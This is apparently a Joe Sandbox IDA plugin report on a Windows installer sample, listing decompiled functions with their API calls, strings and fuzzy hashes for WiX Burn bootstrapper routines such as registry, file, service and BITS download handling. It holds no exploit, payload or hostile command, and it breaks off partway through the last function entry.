Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: ab22d08ad39d503c41ce18387a399fa5316cf1c0784ae34088f229c1901a496c
Instruction ID: 7d678f3cc10e29b31b738171ef26d7ed22595e66a4c01f22c5b4bb3713506279
Opcode Fuzzy Hash: ab22d08ad39d503c41ce18387a399fa5316cf1c0784ae34088f229c1901a496c
Instruction Fuzzy Hash: 8521AC35D00126BBDB719B65CC49FAFBFB9EF40710F10017AFD14A2191E7394A44D694

Function 0050433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00504440: FindFirstFileW.KERNEL32(004E923A,?,00000100,00000000,00000000), ref: 0050447B
Part of subcall function 00504440: FindClose.KERNEL32(00000000), ref: 00504487

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00504430

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

Part of subcall function 00501217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0050123F
Part of subcall function 00501217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,004D70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00501276

Strings

\, xrefs: 005043B9
PendingFileRenameOperations, xrefs: 0050439B
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0050436F
crypt32.dll, xrefs: 00504368

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: 6dc302d4eb3294f82f622bbb5975612b805c578a90a7e7b900ff4d043bd18fee
Instruction ID: 8636d2cb84eccc41d4987c011f6a92a9040f09407079df65178484de4c122453
Opcode Fuzzy Hash: 6dc302d4eb3294f82f622bbb5975612b805c578a90a7e7b900ff4d043bd18fee
Instruction Fuzzy Hash: F5319FB1A00219EBDF20AF91CC41ABEBF75FF00750F58817AEA04A61A1E3719E80DF50

Function 00504019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,004C4DBC,00000000,?,?,00000000,?,0050412D,00000000,004C4DBC,00000000,00000000,?,004D85EE,?,?), ref: 00504033
GetLastError.KERNEL32(?,0050412D,00000000,004C4DBC,00000000,00000000,?,004D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00504041
CopyFileW.KERNEL32(00000000,004C4DBC,00000000,004C4DBC,00000000,?,0050412D,00000000,004C4DBC,00000000,00000000,?,004D85EE,?,?,00000001), ref: 005040AC
GetLastError.KERNEL32(?,0050412D,00000000,004C4DBC,00000000,00000000,?,004D85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 005040B6

Strings

fileutil.cpp, xrefs: 005040D5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 3ad677f2741f33931e9a9cb21b7e6bc8e2ca3d1d0c4d86ff4822a36cca92dd6d
Instruction ID: 70b85d5d8877842e5d7f3bd409cd648bbd43967f990c98cdaa5d97159abf9aa8
Opcode Fuzzy Hash: 3ad677f2741f33931e9a9cb21b7e6bc8e2ca3d1d0c4d86ff4822a36cca92dd6d
Instruction Fuzzy Hash: A821C1B660027697EB300A964CA9B3F6E98FF10B60B144536EF04FF591D7618D409AE1

Function 004CEF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004CEF56

Part of subcall function 00504153: SetFileAttributesW.KERNEL32(004E923A,00000080,00000000,004E923A,000000FF,00000000,?,?,004E923A), ref: 00504182
Part of subcall function 00504153: GetLastError.KERNEL32(?,?,004E923A), ref: 0050418C

Part of subcall function 004C3C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,004CEFA1,00000001,00000000,00000095,00000001,004D0663,00000095,00000000,swidtag,00000001), ref: 004C3C88

Strings

swidtag, xrefs: 004CEF65
Failed to allocate regid folder path., xrefs: 004CEFBC
Failed to format tag folder path., xrefs: 004CEFC3
Failed to allocate regid file path., xrefs: 004CEFB5

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: ecb6a17a0d9bf28772dc9c7c11f094750949b8f994207e0aac436125250b2681
Instruction ID: 4a7e9a8027aa156bd57e60a9918e57946d7469faba96ead8884f6f9cc0ed2f1f
Opcode Fuzzy Hash: ecb6a17a0d9bf28772dc9c7c11f094750949b8f994207e0aac436125250b2681
Instruction Fuzzy Hash: FF21BA35D00519BBDB21EB9ACC05F9EFFB5BF44300F1080AEF514A62A1D7799A819B98

Function 004E8DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00500F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0052AAA0,00000000,?,005057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00500F80

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 004E8E3A
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,004CF7E0,00000001,00000100,000001B4,00000000), ref: 004E8E88

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 004E8DD7
Failed to open uninstall registry key., xrefs: 004E8DFD
Failed to enumerate uninstall key for related bundles., xrefs: 004E8E99

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: 1672e922111ebee09fcad0bc2e523be8ed42f8b96681f9b18ae54e9a79fcc9f1
Instruction ID: 4d7d1d2885f401f199d4fd8452f3361fc683e9629fe22296788b621fa7114303
Opcode Fuzzy Hash: 1672e922111ebee09fcad0bc2e523be8ed42f8b96681f9b18ae54e9a79fcc9f1
Instruction Fuzzy Hash: 9621EA32900159FFDF216A95CC4AFEFBA79EF00721F144669F814B6190D7790E90E694

Function 004ED259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004ED2EE
ReleaseMutex.KERNEL32(?), ref: 004ED31C
SetEvent.KERNEL32(?), ref: 004ED325

Strings

Failed to allocate buffer., xrefs: 004ED29D
NetFxChainer.cpp, xrefs: 004ED293

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 88bfd8e108b72c3e68341061b3b549d0e9dd083945cc49b3df42a291888c9e31
Instruction ID: 7c85f37da21deaee9bec766c5c9ffcdb52d79e027174d8eeae6c15aaf654f537
Opcode Fuzzy Hash: 88bfd8e108b72c3e68341061b3b549d0e9dd083945cc49b3df42a291888c9e31
Instruction Fuzzy Hash: E021D3B4A00206BFDB10AF68D884A5DBBF5FF48325F10866AF964A7391C375A9508B94

Function 00505907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,004E6B11,00000000,?), ref: 0050591D
GetLastError.KERNEL32(?,?,004E6B11,00000000,?,?,?,?,?,?,?,?,?,004E6F28,?,?), ref: 0050592B

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,004E6B11,00000000,?), ref: 00505965
GetLastError.KERNEL32(?,?,004E6B11,00000000,?,?,?,?,?,?,?,?,?,004E6F28,?,?), ref: 0050596F

Strings

svcutil.cpp, xrefs: 0050594E, 00505990

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: 9803759083f9e28cdf74bec6b172fce18b09697ce38c74194e0db6df350d8366
Instruction ID: f555c28d72e0f2e1058ae710bbc84d9ea2c5af7bd34e3b2f68cb49f4da948ef8
Opcode Fuzzy Hash: 9803759083f9e28cdf74bec6b172fce18b09697ce38c74194e0db6df350d8366
Instruction Fuzzy Hash: 2521F336941A35F7E7215A958D09FAFBE6DBF40BB0F114415BD05AB280F7218E00EAE0

Function 00503245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00503258
VariantInit.OLEAUT32(?), ref: 00503264
VariantClear.OLEAUT32(?), ref: 005032D8
SysFreeString.OLEAUT32(00000000), ref: 005032E3

Part of subcall function 00503498: SysAllocString.OLEAUT32(?), ref: 005034AD

Strings

`5w, xrefs: 005032E3

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID: `5w
API String ID: 347726874-4151700305
Opcode ID: e0282faeeba698cc12cec447932e70e22185f7bc6a7cce7640e92f177273a2af
Instruction ID: 4c28b414321d6873d1271728e3ac1ba13f1b0b1ee928077c920548fabbfd95bc
Opcode Fuzzy Hash: e0282faeeba698cc12cec447932e70e22185f7bc6a7cce7640e92f177273a2af
Instruction Fuzzy Hash: 8C214F3590121AAFCB14DFA8C858EAEBFBDFF48715F104558E8019B260D7319E09DB90

Function 004C9839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 004C98C8

Strings

Failed to read next symbol., xrefs: 004C98E4
Failed to find variable., xrefs: 004C98B5
Failed to parse condition '%ls' at position: %u, xrefs: 004C987A
condition.cpp, xrefs: 004C986A, 004C98AB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: 6a5694f880a44f36ad47262e6b4a664f592b510873cf4e85a6bbda53f8f404e0
Instruction ID: 941963b26dab08512b79e3da48508d88bd9c8c18f9a399d50971e999d391f7f0
Opcode Fuzzy Hash: 6a5694f880a44f36ad47262e6b4a664f592b510873cf4e85a6bbda53f8f404e0
Instruction Fuzzy Hash: BC11C83B19021176DBA53DAD9C8EF9B3E54FF16711F04405EF9006B2D2C66ACD1096F9

Function 004C9E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 004C9E38

Strings

File search: %ls, did not find path: %ls, xrefs: 004C9EA3
Failed to set variable., xrefs: 004C9E97
Failed to format path string., xrefs: 004C9E43
Failed get file version., xrefs: 004C9E78

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: 03aafa73d08517ca27b7b6333bd40de4e392c1b104ae9fac2fd4682d8feb5422
Instruction ID: ef944587b03b9c232606f2f3071be5ac5b1933c73f25d8df77f6aa7852ee5ddc
Opcode Fuzzy Hash: 03aafa73d08517ca27b7b6333bd40de4e392c1b104ae9fac2fd4682d8feb5422
Instruction Fuzzy Hash: AA11BE3AD40129BBCB42AED48C86EAEFF78EF24750F1041AFF90066290D3355E109B95

Function 004D820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 004C394F: GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
Part of subcall function 004C394F: RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,004D8E17,0000001A,00000000,?,00000000,00000000), ref: 004D8258
GetLastError.KERNEL32(?,?,004D8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 004D8262

Strings

Failed to allocate memory for well known SID., xrefs: 004D8240
Failed to create well known SID., xrefs: 004D8290
cache.cpp, xrefs: 004D8236, 004D8286

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: 0b5a0d992027493ccc53c887b9544215b7d0f75bc411f0b542b90eca96ecd22f
Instruction ID: 01d7952dfde6ce6f61a2a5d54e9bdd776735dd5d3a7e94044bf59191804caf4b
Opcode Fuzzy Hash: 0b5a0d992027493ccc53c887b9544215b7d0f75bc411f0b542b90eca96ecd22f
Instruction Fuzzy Hash: 6C012937545625BBD63166999C4AFAF6E5CDF81B70B11405FFD00AB380EE798D4041E8

Function 004EDDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 004EDDCE
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004EDDF8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,004EDFC8,00000000,?,?,?,?,00000000), ref: 004EDE00

Strings

bitsengine.cpp, xrefs: 004EDE24
Failed while waiting for download., xrefs: 004EDE2E

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsengine.cpp
API String ID: 435350009-228655868
Opcode ID: 062d865a6affd96e59cf833622369d13b607e1bffd6b85defb702925b12591b5
Instruction ID: fb8399a4671f9e68a6557d7c2dc11b406c3366e0790e90fccbd247e24a37b76c
Opcode Fuzzy Hash: 062d865a6affd96e59cf833622369d13b607e1bffd6b85defb702925b12591b5
Instruction Fuzzy Hash: 69110A73E4127577D7205AAA9C4DEEF7A5CEF15762F100116FE04FB2C0D664990081E8

Function 004C5F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 004C5F5C
GetLastError.KERNEL32 ref: 004C5F66

Strings

variable.cpp, xrefs: 004C5F8A
Failed to set variant value., xrefs: 004C5FAD
Failed to get computer name., xrefs: 004C5F94

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: 597387845222469709fbbb5f0ee6010f84c1fff04b1161bcd708beb841eae44f
Instruction ID: 950b42493b3860e86961ee5d21e9e51d1b256e843ee549c44307847e78badd81
Opcode Fuzzy Hash: 597387845222469709fbbb5f0ee6010f84c1fff04b1161bcd708beb841eae44f
Instruction Fuzzy Hash: F311E937A415296BD724DB959C05FDFBBE8EB08710F11011EFD00FB280DA74AE4486E5

Function 004C5E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 004C5EA6

Part of subcall function 00500ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,004C5EB2,00000000), ref: 00500AE0
Part of subcall function 00500ACC: GetProcAddress.KERNEL32(00000000), ref: 00500AE7
Part of subcall function 00500ACC: GetLastError.KERNEL32(?,?,?,004C5EB2,00000000), ref: 00500AFE

Part of subcall function 00503D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00503D4C

Strings

variable.cpp, xrefs: 004C5ED0
Failed to get 64-bit folder., xrefs: 004C5EF0
Failed to set variant value., xrefs: 004C5F0A
Failed to get shell folder., xrefs: 004C5EDA

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: 898a504fcf385169610ffd8127f6a74c29032cb4d9631548c32895dd9dfb6606
Instruction ID: 618a94d956980af41245a4b23ee768bccb3df86ca47513fce33768199134f7be
Opcode Fuzzy Hash: 898a504fcf385169610ffd8127f6a74c29032cb4d9631548c32895dd9dfb6606
Instruction Fuzzy Hash: FF019B36945619B7DF26A790CC0AFAE7E68FF00761F10415EF900B61C0DB79AE8097E9

Function 00504153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00504440: FindFirstFileW.KERNEL32(004E923A,?,00000100,00000000,00000000), ref: 0050447B
Part of subcall function 00504440: FindClose.KERNEL32(00000000), ref: 00504487

SetFileAttributesW.KERNEL32(004E923A,00000080,00000000,004E923A,000000FF,00000000,?,?,004E923A), ref: 00504182
GetLastError.KERNEL32(?,?,004E923A), ref: 0050418C
DeleteFileW.KERNEL32(004E923A,00000000,004E923A,000000FF,00000000,?,?,004E923A), ref: 005041AC
GetLastError.KERNEL32(?,?,004E923A), ref: 005041B6

Strings

fileutil.cpp, xrefs: 005041D1

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: 7ef0f3d9ce0eeb15178b1d4bf29a4cacbf0d107334320312962b0360de0b0f87
Instruction ID: a8c07fb42ee719d1ec26ecb99e8100b878ad42f7249316fc290c20d904786d89
Opcode Fuzzy Hash: 7ef0f3d9ce0eeb15178b1d4bf29a4cacbf0d107334320312962b0360de0b0f87
Instruction Fuzzy Hash: B70145F2A41B36A7E7314AA68D09B6F7EA8BF20760F010210FE04EA2C0D7218D90D9D0

Function 004EDA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004EDA1A
LeaveCriticalSection.KERNEL32(?), ref: 004EDA5F
SetEvent.KERNEL32(?,?,?,?), ref: 004EDA73

Strings

Failure while sending progress during BITS job modification., xrefs: 004EDA4E
Failed to get state during job modification., xrefs: 004EDA33

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
